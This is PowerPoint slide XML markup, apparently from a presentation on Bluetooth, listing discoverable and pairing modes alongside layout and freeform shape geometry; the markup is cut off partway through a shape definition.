        <p:spPr>
          <a:xfrm>
            <a:off x="624426" y="1204652"/>
            <a:ext cx="2820577" cy="70788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70C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Discoverable modes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47DCE1AF-49E3-4E61-83FE-0C7767A89AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050624" y="4094202"/>
            <a:ext cx="2120638" cy="70788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>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pairing modes 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3D30399A-9CC9-4597-BC17-2C2FBDC140B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624426" y="1828563"/>
            <a:ext cx="4513736" cy="224676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6075" marR="0" lvl="0" indent="-346075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Discoverable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Sends inquiry responses to all inquiries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-346075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Limited discoverable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Visible for a certain period of time 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346075" marR="0" lvl="0" indent="-346075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Non-discoverable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Never answers an inquiry scan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6A5EF7E2-BD99-4BDE-B50E-D62B0C362907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050624" y="4728022"/>
            <a:ext cx="4836576" cy="107721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6075" marR="0" lvl="0" indent="-346075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Non-pairable mode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Rejects every pairing request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346075" marR="0" lvl="0" indent="-346075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Pairable mode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Pairs upon request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013E905-E4C0-4D83-B459-C07E919FC159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5221095" y="1086354"/>
            <a:ext cx="1759382" cy="5476338"/>
            <a:chOff x="5221095" y="1086354"/>
            <a:chExt cx="1759382" cy="5476338"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Isosceles Triangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAE33D3-86DD-4A1F-8325-D2F60574DA8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4977733" y="2241850"/>
              <a:ext cx="961495" cy="474771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1" name="Isosceles Triangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9342F3C2-C595-4EF0-BEB2-A67A975C4F12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="6262560" y="4908141"/>
              <a:ext cx="959742" cy="476093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AE0FCD0A-071A-4D56-A509-8734966429F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6055998" y="1300436"/>
              <a:ext cx="84613" cy="5262256"/>
              <a:chOff x="6081906" y="1872958"/>
              <a:chExt cx="61784" cy="4985041"/>
            </a:xfrm>
          </p:grpSpPr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97AE0FC2-6258-48E7-B57F-9ECDBFF89EEF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6081906" y="1872958"/>
                <a:ext cx="0" cy="4985041"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="tx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1398C956-4D74-4C51-9BCD-4C2CEE3B6028}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6143690" y="1872958"/>
                <a:ext cx="0" cy="4985041"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="tx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79482D4F-F684-4879-AB5F-B02A7B4103A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5953887" y="1086354"/>
              <a:ext cx="284480" cy="284480"/>
              <a:chOff x="5953760" y="1631295"/>
              <a:chExt cx="284480" cy="284480"/>
            </a:xfrm>
          </p:grpSpPr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834688C3-F90F-4B4E-BD98-8D6093937C34}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5953760" y="1631295"/>
                <a:ext cx="284480" cy="284480"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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9" name="Oval 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0AC675-E560-4D57-8B40-C78F0B667121}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6036747" y="1714282"/>
                <a:ext cx="118506" cy="11850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</p:grp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93D1BDDB-06D1-4684-8FC2-BAC0A8C9E67E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5757840" y="2136381"/>
              <a:ext cx="675887" cy="675887"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100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8FCD5894-9C1F-4F34-971E-337CA2953E5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5753914" y="4803470"/>
              <a:ext cx="675888" cy="675888"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="38100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4FF7905A-C40E-4907-969B-9F0D6D12F1DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5847959" y="2243492"/>
              <a:ext cx="495649" cy="46166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01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1B7FDEE3-2998-423C-B8F7-B0E133166A40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5844034" y="4910582"/>
              <a:ext cx="495649" cy="46166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02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740D5F58-7304-4801-B82C-9F5AA850F834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7727951" y="914400"/>
            <a:ext cx="3016249" cy="2889250"/>
            <a:chOff x="958850" y="1468438"/>
            <a:chExt cx="3016249" cy="2889250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 777">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562D9F26-BA87-402C-9D3D-20C608A61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962" y="3402013"/>
              <a:ext cx="928687" cy="955675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 544 w 553"/>
                <a:gd name="T1" fmla="*/ 274 h 570"/>
                <a:gd name="T2" fmla="*/ 292 w 553"/>
                <a:gd name="T3" fmla="*/ 10 h 570"/>
                <a:gd name="T4" fmla="*/ 7 w 553"/>
                <a:gd name="T5" fmla="*/ 240 h 570"/>
                <a:gd name="T6" fmla="*/ 191 w 553"/>
                <a:gd name="T7" fmla="*/ 491 h 570"/>
                <a:gd name="T8" fmla="*/ 159 w 553"/>
                <a:gd name="T9" fmla="*/ 570 h 570"/>
                <a:gd name="T10" fmla="*/ 372 w 553"/>
                <a:gd name="T11" fmla="*/ 490 h 570"/>
                <a:gd name="T12" fmla="*/ 372 w 553"/>
                <a:gd name="T13" fmla="*/ 489 h 570"/>
                <a:gd name="T14" fmla="*/ 544 w 553"/>
                <a:gd name="T15" fmla="*/ 274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3" h="570">
                  <a:moveTo>
                    <a:pt x="544" y="274"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="553" y="138"/>
                    <a:pt x="440" y="19"/>
                    <a:pt x="292" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="16" y="103"/>
                    <a:pt x="7" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="354"/>
                    <a:pt x="78" y="456"/>
                    <a:pt x="191" y="491"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="541"/>
                    <a:pt x="159" y="570"/>
                    <a:pt x="159" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="563"/>
                    <a:pt x="372" y="490"/>
                    <a:pt x="372" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="489"/>
                    <a:pt x="372" y="489"/>
                    <a:pt x="372" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="468" y="456"/>
                    <a:pt x="538" y="374"/>
                    <a:pt x="544" y="27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/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 778">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E9A6C2-5CD4-47C1-B0AD-47AF41F09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225" y="1584325"/>
              <a:ext cx="1073150" cy="1082675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 640"/>
                <a:gd name="T1" fmla="*/ 338 h 645"/>
                <a:gd name="T2" fmla="*/ 286 w 640"/>
                <a:gd name="T3" fmla="*/ 22 h 645"/>
                <a:gd name="T4" fmla="*/ 623 w 640"/>
                <a:gd name="T5" fmla="*/ 260 h 645"/>
                <a:gd name="T6" fmla="*/ 434 w 640"/>
                <a:gd name="T7" fmla="*/ 557 h 645"/>
                <a:gd name="T8" fmla="*/ 477 w 640"/>
                <a:gd name="T9" fmla="*/ 644 h 645"/>
                <a:gd name="T10" fmla="*/ 230 w 640"/>
                <a:gd name="T11" fmla="*/ 569 h 645"/>
                <a:gd name="T12" fmla="*/ 230 w 640"/>
                <a:gd name="T13" fmla="*/ 568 h 645"/>
                <a:gd name="T14" fmla="*/ 20 w 640"/>
                <a:gd name="T15" fmla="*/ 338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40" h="645">
                  <a:moveTo>
                    <a:pt x="20" y="338"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="185"/>
                    <a:pt x="119" y="43"/>
                    <a:pt x="286" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="0"/>
                    <a:pt x="603" y="107"/>
                    <a:pt x="623" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="640" y="389"/>
                    <a:pt x="559" y="509"/>
                    <a:pt x="434" y="557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441" y="613"/>
                    <a:pt x="477" y="644"/>
                    <a:pt x="477" y="644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="645"/>
                    <a:pt x="230" y="569"/>
                    <a:pt x="230" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="568"/>
                    <a:pt x="230" y="568"/>
                    <a:pt x="230" y="568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="538"/>
                    <a:pt x="35" y="451"/>
                    <a:pt x="20" y="3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35" name="Freeform 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356EF60D-F63D-4902-B685-60B2E2410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524" y="3206750"/>
              <a:ext cx="658812" cy="660400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 377 w 393"/>
                <a:gd name="T1" fmla="*/ 216 h 394"/>
                <a:gd name="T2" fmla="*/ 224 w 393"/>
                <a:gd name="T3" fmla="*/ 17 h 394"/>
                <a:gd name="T4" fmla="*/ 13 w 393"/>
                <a:gd name="T5" fmla="*/ 153 h 394"/>
                <a:gd name="T6" fmla="*/ 120 w 393"/>
                <a:gd name="T7" fmla="*/ 338 h 394"/>
                <a:gd name="T8" fmla="*/ 92 w 393"/>
                <a:gd name="T9" fmla="*/ 390 h 394"/>
                <a:gd name="T10" fmla="*/ 244 w 393"/>
                <a:gd name="T11" fmla="*/ 350 h 394"/>
                <a:gd name="T12" fmla="*/ 244 w 393"/>
                <a:gd name="T13" fmla="*/ 350 h 394"/>
                <a:gd name="T14" fmla="*/ 377 w 393"/>
                <a:gd name="T15" fmla="*/ 216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3" h="394">
                  <a:moveTo>
                    <a:pt x="377" y="216"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="124"/>
                    <a:pt x="325" y="35"/>
                    <a:pt x="224" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="0"/>
                    <a:pt x="30" y="60"/>
                    <a:pt x="13" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="230"/>
                    <a:pt x="46" y="305"/>
                    <a:pt x="120" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="372"/>
                    <a:pt x="92" y="390"/>
                    <a:pt x="92" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="394"/>
                    <a:pt x="244" y="350"/>
                    <a:pt x="244" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="350"/>
                    <a:pt x="244" y="350"/>
                    <a:pt x="244" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="335"/>
                    <a:pt x="365" y="284"/>
                    <a:pt x="377" y="21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36" name="Freeform 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D61672D3-4BC2-488B-9011-3AC25DEC4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850" y="2201863"/>
              <a:ext cx="660400" cy="661987"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 377 w 393"/>
                <a:gd name="T1" fmla="*/ 217 h 395"/>
                <a:gd name="T2" fmla="*/ 224 w 393"/>
                <a:gd name="T3" fmla="*/ 18 h 395"/>
                <a:gd name="T4" fmla="*/ 13 w 393"/>
                <a:gd name="T5" fmla="*/ 153 h 395"/>
                <a:gd name="T6" fmla="*/ 120 w 393"/>
                <a:gd name="T7" fmla="*/ 339 h 395"/>
                <a:gd name="T8" fmla="*/ 92 w 393"/>
                <a:gd name="T9" fmla="*/ 390 h 395"/>
                <a:gd name="T10" fmla="*/ 243 w 393"/>
                <a:gd name="T11" fmla="*/ 351 h 395"/>
                <a:gd name="T12" fmla="*/ 243 w 393"/>
                <a:gd name="T13" fmla="*/ 351 h 395"/>
                <a:gd name="T14" fmla="*/ 377 w 393"/>
                <a:gd name="T15" fmla="*/ 217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3" h="395">
                  <a:moveTo>
                    <a:pt x="377" y="217"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="124"/>
                    <a:pt x="325" y="35"/>
                    <a:pt x="224" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="0"/>
                    <a:pt x="29" y="61"/>
                    <a:pt x="13" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="231"/>
                    <a:pt x="46" y="306"/>
                    <a:pt x="120" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="372"/>
                    <a:pt x="92" y="390"/>
                    <a:pt x="92" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="395"/>
                    <a:pt x="243" y="351"/>
                    <a:pt x="243" y="351"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="351"/>
                    <a:pt x="243" y="351"/>
                    <a:pt x="243" y="351"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="335"/>
                    <a:pt x="365" y="285"/>
                    <a:pt x="377" y="21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37" name="Freeform 781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF95AE6-3E59-444D-9C78-AE3705C9C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887" y="2179638"/>
              <a:ext cx="1192212" cy="1196975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 682 w 711"/>
                <a:gd name="T1" fmla="*/ 391 h 713"/>
                <a:gd name="T2" fmla="*/ 406 w 711"/>
                <a:gd name="T3" fmla="*/ 31 h 713"/>
                <a:gd name="T4" fmla="*/ 24 w 711"/>
                <a:gd name="T5" fmla="*/ 277 h 713"/>
                <a:gd name="T6" fmla="*/ 217 w 711"/>
                <a:gd name="T7" fmla="*/ 611 h 713"/>
                <a:gd name="T8" fmla="*/ 167 w 711"/>
                <a:gd name="T9" fmla="*/ 705 h 713"/>
                <a:gd name="T10" fmla="*/ 440 w 711"/>
                <a:gd name="T11" fmla="*/ 634 h 713"/>
                <a:gd name="T12" fmla="*/ 440 w 711"/>
                <a:gd name="T13" fmla="*/ 633 h 713"/>
                <a:gd name="T14" fmla="*/ 682 w 711"/>
                <a:gd name="T15" fmla="*/ 391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1" h="713">
                  <a:moveTo>
                    <a:pt x="682" y="391"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="224"/>
                    <a:pt x="587" y="63"/>
                    <a:pt x="406" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="53" y="109"/>
                    <a:pt x="24" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="417"/>
                    <a:pt x="83" y="552"/>
                    <a:pt x="217" y="611"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="672"/>
                    <a:pt x="167" y="705"/>
                    <a:pt x="167" y="705"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="713"/>
                    <a:pt x="440" y="634"/>
                    <a:pt x="440" y="634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="440" y="633"/>
                    <a:pt x="440" y="633"/>
                    <a:pt x="440" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="563" y="605"/>
                    <a:pt x="661" y="514"/>
                    <a:pt x="682" y="39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38" name="Freeform 782">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7529BC20-D650-4F08-978A-E45BCE395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7" y="1468438"/>
              <a:ext cx="919162" cy="922337"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 526 w 548"/>
                <a:gd name="T1" fmla="*/ 302 h 550"/>
                <a:gd name="T2" fmla="*/ 313 w 548"/>
                <a:gd name="T3" fmla="*/ 25 h 550"/>
                <a:gd name="T4" fmla="*/ 19 w 548"/>
                <a:gd name="T5" fmla="*/ 214 h 550"/>
                <a:gd name="T6" fmla="*/ 167 w 548"/>
                <a:gd name="T7" fmla="*/ 472 h 550"/>
                <a:gd name="T8" fmla="*/ 128 w 548"/>
                <a:gd name="T9" fmla="*/ 544 h 550"/>
                <a:gd name="T10" fmla="*/ 339 w 548"/>
                <a:gd name="T11" fmla="*/ 489 h 550"/>
                <a:gd name="T12" fmla="*/ 339 w 548"/>
                <a:gd name="T13" fmla="*/ 489 h 550"/>
                <a:gd name="T14" fmla="*/ 526 w 548"/>
                <a:gd name="T15" fmla="*/ 302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8" h="550">
                  <a:moveTo>
                    <a:pt x="526" y="302"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="173"/>
                    <a:pt x="453" y="49"/>
                    <a:pt x="313" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="0"/>
                    <a:pt x="41" y="85"/>
                    <a:pt x="19" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="322"/>
                    <a:pt x="64" y="427"/>
                    <a:pt x="167" y="472"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="519"/>
                    <a:pt x="128" y="544"/>
                    <a:pt x="128" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="550"/>
                    <a:pt x="339" y="489"/>
                    <a:pt x="339" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="489"/>
                    <a:pt x="339" y="489"/>
                    <a:pt x="339" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="468"/>
                    <a:pt x="509" y="397"/>
                    <a:pt x="526" y="30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39" name="Freeform 783">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D738E8A-D4D8-420A-9533-270C5AC7F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312" y="2525713"/>
              <a:ext cx="1184275" cy="1236662"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 706"/>
                <a:gd name="T1" fmla="*/ 337 h 737"/>
                <a:gd name="T2" fmla="*/ 344 w 706"/>
                <a:gd name="T3" fmla="*/ 6 h 737"/>
                <a:gd name="T4" fmla="*/ 702 w 706"/>
                <a:gd name="T5" fmla="*/ 316 h 737"/>
                <a:gd name="T6" fmla="*/ 453 w 706"/>
                <a:gd name="T7" fmla="*/ 633 h 737"/>
                <a:gd name="T8" fmla="*/ 491 w 706"/>
                <a:gd name="T9" fmla="*/ 737 h 737"/>
                <a:gd name="T10" fmla="*/ 219 w 706"/>
                <a:gd name="T11" fmla="*/ 624 h 737"/>
                <a:gd name="T12" fmla="*/ 219 w 706"/>
                <a:gd name="T13" fmla="*/ 623 h 737"/>
                <a:gd name="T14" fmla="*/ 5 w 706"/>
                <a:gd name="T15" fmla="*/ 337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6" h="737">
                  <a:moveTo>
                    <a:pt x="5" y="337"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="160"/>
                    <a:pt x="151" y="12"/>
                    <a:pt x="344" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="0"/>
                    <a:pt x="696" y="139"/>
                    <a:pt x="702" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="464"/>
                    <a:pt x="600" y="592"/>
                    <a:pt x="453" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="698"/>
                    <a:pt x="491" y="737"/>
                    <a:pt x="491" y="737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="722"/>
                    <a:pt x="219" y="624"/>
                    <a:pt x="219" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="623"/>
                    <a:pt x="219" y="623"/>
                    <a:pt x="219" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="577"/>
                    <a:pt x="9" y="467"/>
                    <a:pt x="5" y="3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40" name="Freeform 784">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1E415B-6C62-46A9-A1A6-2A8D39D2A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474" y="3046413"/>
              <a:ext cx="612775" cy="636587"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 365"/>
                <a:gd name="T1" fmla="*/ 174 h 380"/>
                <a:gd name="T2" fmla="*/ 178 w 365"/>
                <a:gd name="T3" fmla="*/ 3 h 380"/>
                <a:gd name="T4" fmla="*/ 362 w 365"/>
                <a:gd name="T5" fmla="*/ 163 h 380"/>
                <a:gd name="T6" fmla="*/ 234 w 365"/>
                <a:gd name="T7" fmla="*/ 327 h 380"/>
                <a:gd name="T8" fmla="*/ 254 w 365"/>
                <a:gd name="T9" fmla="*/ 380 h 380"/>
                <a:gd name="T10" fmla="*/ 114 w 365"/>
                <a:gd name="T11" fmla="*/ 322 h 380"/>
                <a:gd name="T12" fmla="*/ 114 w 365"/>
                <a:gd name="T13" fmla="*/ 321 h 380"/>
                <a:gd name="T14" fmla="*/ 3 w 365"/>
                <a:gd name="T15" fmla="*/ 174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5" h="380">
                  <a:moveTo>
                    <a:pt x="3" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83"/>
                    <a:pt x="79" y="6"/>
                    <a:pt x="178" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="0"/>
                    <a:pt x="360" y="72"/>
                    <a:pt x="362" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="239"/>
                    <a:pt x="310" y="306"/>
                    <a:pt x="234" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="360"/>
                    <a:pt x="254" y="380"/>
                    <a:pt x="254" y="380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="372"/>
                    <a:pt x="114" y="322"/>
                    <a:pt x="114" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="321"/>
                    <a:pt x="114" y="321"/>
                    <a:pt x="114" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="297"/>
                    <a:pt x="5" y="241"/>
                    <a:pt x="3" y="1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41" name="Freeform 785">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649607C4-9309-453D-97BC-4FD594C2F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512" y="1485900"/>
              <a:ext cx="752475" cy="785812"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 449"/>
                <a:gd name="T1" fmla="*/ 214 h 469"/>
                <a:gd name="T2" fmla="*/ 219 w 449"/>
                <a:gd name="T3" fmla="*/ 4 h 469"/>
                <a:gd name="T4" fmla="*/ 446 w 449"/>
                <a:gd name="T5" fmla="*/ 201 h 469"/>
                <a:gd name="T6" fmla="*/ 288 w 449"/>
                <a:gd name="T7" fmla="*/ 403 h 469"/>
                <a:gd name="T8" fmla="*/ 313 w 449"/>
                <a:gd name="T9" fmla="*/ 469 h 469"/>
                <a:gd name="T10" fmla="*/ 140 w 449"/>
